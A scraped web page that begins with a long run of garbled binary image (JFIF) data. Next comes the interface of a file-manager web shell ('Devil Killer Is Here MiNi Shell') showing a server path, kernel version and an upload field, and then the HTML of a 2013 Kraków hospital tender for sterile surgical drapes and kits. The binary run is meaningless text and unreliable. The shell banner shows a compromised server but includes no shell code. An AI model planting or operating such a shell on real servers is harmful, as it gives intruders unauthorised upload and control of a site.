JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131030/441980-N-2013.html

<p class="kh_header"><b>Kraków: Dostawa obłożeń do laparoskopii oraz zestawów chirurgicznych, ginekologicznych i urologicznych</b><br>
<b>Numer ogłoszenia: 441980 - 2013; data zamieszczenia: 30.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. Stefana Żeromskiego Samodzielny Publiczny Zakład Opieki Zdrowotnej w Krakowie , os. Na Skarpie 66, 31-913 Kraków, woj. małopolskie, tel. (012) 6441956, faks (012) 6444756.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zeromski-szpital.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa obłożeń do laparoskopii oraz zestawów chirurgicznych, ginekologicznych i urologicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa obłożeń do laparoskopii oraz zestawów chirurgicznych, ginekologicznych i urologicznych zgodnie z opisem przedmiotu zamówienia określonym w załączniku nr 5 do specyfikacji. Oferowany sprzęt medyczny musi spełniać wszystkie parametry wymienione w załączniku nr 5 do specyfikacji. Niespełnienie któregokolwiek z nich skutkować będzie odrzuceniem oferty Wykonawcy.

Grupa 1
1.Jałowy zestaw do laparoskopii uniwersalny o składzie - 500 zestawów
2.Jałowy zestaw do laparoskopii duży o składzie - 150 zestawów
3.Jałowy zestaw chirurgiczny o składzie - 500 zestawów
4.Sterylny zestaw do urologii - 200 zestawów
5. Sterylny zestaw do ginekologii - 150 zestawów
Grupa 2
1.Maska chirurgiczna - 10000 szt.
2.Sterylna serweta - 1500 szt.
3.Serweta sterylna - 1500 szt.
4.Jednorazowe jałowe fartuchy chirurgiczne - 4000 szt.
Grupa 3
1.Jałowy uchwyt rzepowy 2x23cm - 600 szt.
2.Jałowa osłona zabezpieczające kable video i optykę endoskopową 13-15x220-250cm - 140 szt.
3.Jałowy zestaw miseczek 1 - 500 zestawów
4.Jałowy zestaw miseczek 2 - 500 zestawów
5.Jałowy zestaw miseczek 3 - 500 zestawów
Grupa 4
1. Jednorazowa jałowa stalowa igła z kulką 1,2 x 80 mm, długość 9,5 cm - 600 szt.

1.Oferty nie zawierające pełnego asortymentu określonego w grupie zostaną odrzucone. Zamawiający zastrzega sobie prawo zamówienia mniejszej ilości materiałów medycznych niż określone w załączniku nr 1 do specyfikacji, w przypadku zmniejszenia się jego zapotrzebowania.
2. Zamawiający nie przewiduje udzielenia zamówienia dodatkowego.
3. Zamawiający nie przewiduje zamówień uzupełniających i zawarcia umowy ramowej.
4. Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej i stosowania dynamicznego systemu zakupów.
5. Zamawiający nie przewiduje rozliczenia w walutach obcych.
6. Warunki dodatkowe dotyczące przedmiotu zamówienia:
- okres ważności przedmiotu zamówienia: nie krótszy niż 12 miesięcy od daty dostawy
7. Dla wszystkich oferowanych grup należy dołączyć do oferty katalogi producenta zawierające pełną informację o parametrach oferowanego wyrobu w języku polskim .
8.Wykonawca ubiegający się o udzielenie zamówienia zobowiązany jest dostarczyć Zamawiającemu partię próbną po 1 komplecie z każdej pozycji asortymentowej opisanej w grupie nr 1 oraz po  jednej sztuce  z każdej pozycji asortymentowej w grupie 2.
9. Oferowane wyroby medyczne, muszą spełniać wymagania odpowiednich norm, przepisów Unii Europejskiej oraz ustawy z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. Nr 107 poz. 679 ze zm.), tj. posiadają wpisy i świadectwa wydane przez uprawnione organy
10. W przypadku produktów, które nie podlegają przepisom ustawy z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. Nr 107 poz. 679), Wykonawca zobowiązany jest posiadać inne odpowiednie dokumenty dopuszczające te produkty do obrotu i stosowania.
11. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom (art. 36 ust. 4 ustawy).
12. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
13. Wykonawca może złożyć tylko 1 ofertę.
14. Zamawiający nie zamierza zwołać zebrania Wykonawców.
15. Zamawiający dopuszcza możliwość złożenia ofert równoważnych w oparciu o art. 29 ust. 3 ustawy. Za równoważny przedmiot zamówienia Zamawiający uzna przedmiot o parametrach nie gorszych niż wskazane w specyfikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 33.14.10.00-0, 33.16.90.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Formularz oświadczenia stanowi załącznik nr 2 do SIWZ. Ocena spełniania warunków dokonana zostanie zgodnie z formuła spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Formularz oświadczenia stanowi załącznik nr 2 do SIWZ. Ocena spełniania warunków dokonana zostanie zgodnie z formuła spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Formularz oświadczenia stanowi załącznik nr 2 do SIWZ. Ocena spełniania warunków dokonana zostanie zgodnie z formuła spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Formularz oświadczenia stanowi załącznik nr 2 do SIWZ. Ocena spełniania warunków dokonana zostanie zgodnie z formuła spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 50 procent ceny oferty (w przypadku złożenia ofert częściowych - 50 procent sumy cen ofert częściowych). Ocena spełniania warunków dokonana zostanie zgodnie z formuła spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy zgodnie z wymaganiami określonymi w SIWZ oraz wzorem stanowiącym załącznik nr 1 do SIWZ. 2.Upoważnienie (pełnomocnictwo) do podpisania oferty winno być dołączone do oferty, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę. 3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w §1 ust. 6 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. 2013 poz. 231), kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zeromski-szpital.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpitala, Kraków, os. Na Skarpie 66, pokój nr 7, w godz. 80 0 -14 0 0 lub na pisemny wniosek drogą pocztową.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2013 godzina 10:00, miejsce: Kancelaria Szpitala Specjalistycznego im. Stefana Żeromskiego SP ZOZ w Krakowie, os. Na Skarpie 66, 31-913 Kraków, Pawilon A, pokój nr 21..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grupa 1
1. Jałowy zestaw do laparoskopii uniwersalny w ilości - 500 zestawów o składzie
1 x serweta na stół narzędziowy 2-warstwowa (min. 55g/mkw) na całej powierzchni  min. 200 x 150 cm (owinięcie zestawu)
1 x serweta 2-warstwowa samoprzylepna 175 x 170 cm (+ 5 cm)
1 x serweta 2-warstwowa samoprzylepna 240 x 150 cm (+ 5 cm)
2 x serweta 2-warstwowa samoprzylepna 90 x 75 cm (+ 5 cm)
1 x kieszeń samoprzylepna 2-sekcyjna 43 x 38 cm (+ 2 cm)
1 x serweta na stolik Mayo 80 x 145 cm składana teleskopowo, folia piaskowana, pad chłonny na całej długości
1 x fartuch chirurgiczny L z włókniny PP SMMMS o gramaturze od 35 - 37 g/mkw, odporny na działanie alkoholi, antystatyczny, typu open back; mankiety 10) procent poliester, szwy ultradźwiękowe;
2 x fartuch chirurgiczny XL z włókniny PP SMMMS o gramaturze 35 - 37g/mkw, odporny na działanie alkoholi, antystatyczny, z zakładką na plecach; mankiety 100 procent poliester, szwy ultradźwiękowe;
20 x kompres z gazy 10 x 10 cm, 12 warstw, 17 n
3 x tupfer z gazy  47 x 40 cm (+ 5 cm), 20 nitek
1 x miska plastikowa 250 ml, z podziałką
2 x osłona na kable kamery 13-15 x 220-250 cm
4 x ręcznik celulozowy min. 33 x 33 cm
2 x uchwyt rzepowy
1 x czyścik do koagulacji 5 x 5 cm
Zestawy pakowane do transportu w 2 opakowania transportowe. Sterylizacja EO.
2. Jałowy zestaw do laparoskopii duży w ilości - 150 zestawów o składzie
1 x serweta na stół narzędziowy 2-warstwowa (min. 55g/mkw) na całej powierzchni min. 200 x 150 cm
1 x serweta 3-warstwowa (min 74g.mkw) na całej powierzchni do laparoskopii 260 x 320 cm (+ 5 cm) z samoprzylepnym otworem 26 x 30 cm z 6 zintegrowanymi kieszeniami na narzędzia wokół oraz z dodatkowym otworem 12 x 15 cm z zasłaniającą klapką w okolicy annusa; serweta ze zintegrowanymi osłonami na nogi i ekranem anestezjologicznym oraz z prowadnicami drenów z obu stron
1 x serweta nieprzylepna 2-warstwowa 90 x 75 cm (+ 5 cm)
1 x serweta na stolik Mayo 80 x 145 cm (+ 5 cm), składana teleskopowo, z piaskowanej folii, pad chłonny na całej długości
1 x fartuch chirurgiczny  L z włókniny PP SMMMS o gramaturze od 35 - 37 g/mkw, odporny na działanie alkoholi, antystatyczny, typu open back; mankiety 100 procent poliester, szwy ultradźwiękowe;
2 x fartuch chirurgiczny XL z włókniny PP SMMMS o gramaturze 35 - 37g/mkw, odporny na działanie alkoholi, antystatyczny, z zakładką na plecach,; mankiety 100 procent poliester, szwy ultradźwiękowe;
20 x kompres z gazy z nitką RTG 10 x 10 cm, 12 warstw 17 n
3 x tupfer z gazy 47 x 40 cm  (+ 5 cm), 20 nitek
1 x miska plastikowa 250 ml, z podziałką
2 x osłona na kable kamery 12-15 x 220-250 cm, składana teleskopowo, z tekturową prowadnicą
2 x ręcznik celulozowy min. 33 x 33 cm
1 x czyścik do koagulacji 5 x 5 cm kontrastujący w RTG
Zestawy pakowane do transportu w 2 opakowania transportowe. Sterylizacja EO.
3. Jałowy zestaw chirurgiczny w ilości - 500 zestawów o składzie
1 x serweta na stół narzędziowy 2-warstwowa na całej powierzchni min. 90 x 75 cm (min. 55 g/mkw) (owinięcie pakietu ),
1 x serweta przylepna 2-warstwowa 2-częściowa z regulacją otworu 75 x 90 cm (+ 5 cm) ,
1 x skalpel jednorazowy bezpiecznie zasuwany , rozmiar 10 ,
1 x  nożyczki zagięte typu Metzenbaum tępo tępe 14,5 cm stalowe jednorazowe,
1 x  imadło chirurgiczne typu Mayo-Hegar 14 cm   stalowe jednorazowe,
1 x  pęseta chirurgiczna standardowa prosta 14 cm stalowa jednorazowa,
1 x  kleszczyki anatomiczne zagięte typu Halsted-Mosquito 12,5 cm stalowe jednorazowe,
1 x  kleszczyki chirurgiczne proste typu Halsted-Mosquito 12,5 cm stalowe jednorazowe,
1 kleszczyki plastikowe proste typu pean 14 cm,
1 x pojemnik plastikowy 250 ml z podziałką,
5 x kompres z włókniny 5 x 5 cm, 6 warstw, min 30g/m2,
10 x kompres z gazy 7,5 x 7,5 cm,  12 warstw, 17 nitek,
3 x tupfer z gazy  20x 20 cm, 20 nitek,
1 x igła injekcyjna bezpieczna 1,2 x 40 mm,
1 x igła injekcyjna bezpieczna 0,7 x 30 mm,
1 x strzykawka 3-częściowa Luer 20 ml.
Każdy zestaw powinien posiadać min. 2 naklejki z REF, LOT i polską nazwą zestawu. Narzędzia wykonane ze stali, matowo wykończone, powinny posiadać symbol jednorazowości umieszczony w sposób trwały, wymagamy po obu stronach narzędzia. Wyrób medyczny klasa IIa reguła 6. Zestawy do transportu pakowane w 2 opakowania transportowe.
4. Sterylny zestaw do urologii,wykonany z włókniny laminowanej min. 2-warstwowej. Skład zestawu:  serweta urologiczna z workiem do zbiórki płynów, osłoną na palec i dwoma oknami (na genitalia i nadłonowym) min. 150x200 cm; serweta na stolik instrumentariuszki min. 140x190 cm; przylepiec taśmowy min. 10x50 cm - 200 zestawów
5. Sterylny zestaw do ginekologii, wykonany z włókniny laminowanej min. 2-warstwowej. Skład zestawu: serweta na stolik instrumentariuszki: min. 100x150 cm serweta z oknem samoprzylepnym min.7x10 cm w rozmiarze min. 100x200 cm; 2 osłony na kończynę 75x120 cm - 150 zestawów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 33.16.90.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Maska chirurgiczna pełnobarierowa z wykonana z trzech warstw wysokiej jakości włóknin, wyposażona w sztywnik zapewniający łatwe dopasowanie się maski do kształtu twarzy, wiązana na troki, gramatura min. 58 	g/mk - 10000 szt.
2. Sterylna serweta z otworem o wymiarach 50-55x60-65cm, wykonana z włókniny laminowanej min. 2-warstwowej, z otworem 6 cm otoczonym taśmą lepną, gramatura min. 57,5 g/mk - 1500 szt.
3. Serweta sterylna na stół narzędziowy wykonana z laminatu min. dwuwarstwowego nieprzemakalnego z warstwą chłonną,  gramatura min. 57,5 g/mk . Rozmiar: 150-155 x 190-195 cm - 1500 szt.
4. Jednorazowe jałowe fartuchy chirurgiczne, wykonane z włókniny polipropylenowej typu SMMS, z elastycznym mankietem min. 6 cm, wiązanie z tyłu tylko na troki, szwy ultradźwiękowe, gramatura min. 35 g/mk, rozmiar L, XL - 4000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jałowy uchwyt rzepowy 2x23cm - 600 szt.
2.Jałowa osłona zabezpieczająca kable video i optykę endoskopową 13-15x220-250cm - 140 szt.
3.Jałowy zestaw miseczek 1 - 500 zestawów
